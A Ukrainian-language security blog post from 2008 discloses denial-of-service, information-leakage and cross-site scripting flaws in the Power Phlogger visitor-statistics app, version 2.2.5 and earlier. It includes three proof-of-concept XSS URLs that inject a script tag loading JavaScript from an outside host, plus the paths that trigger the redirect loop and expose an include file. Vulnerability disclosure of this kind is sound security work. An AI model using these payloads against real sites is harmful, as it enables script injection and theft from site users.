Нові уразливості в Power Phlogger

23:57 14.06.2008

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 17.05.2008 та 31.05.2008, я виявив Denial of Service, Information Leakage та Cross-Site Scripting уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

DoS:

http://site/newaccount_self.php

Скрипт редиректить сам на себе (зациклений редирект). Mozilla автоматично зупиняє даний зациклений редирект (видає Redirect Loop Error), а IE - ні (продовжує звертатися до сервера). Якщо клієнт, що звертається до скрипта, сам не зупинить редирект, наприклад бот пошукових систем, то це спричинить велике навантаження на сервер.

Information Leakage:

http://site/main_location.inc

XSS:

http://site/dspLogs.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20
http://site/dspStats.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20
http://site/edCss.php/%22%3E%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

Дані XSS можливі в зв’язку з використанням в скриптах $PHP_SELF.

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це шоста частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.


Leave a Reply

You must be logged in to post a comment.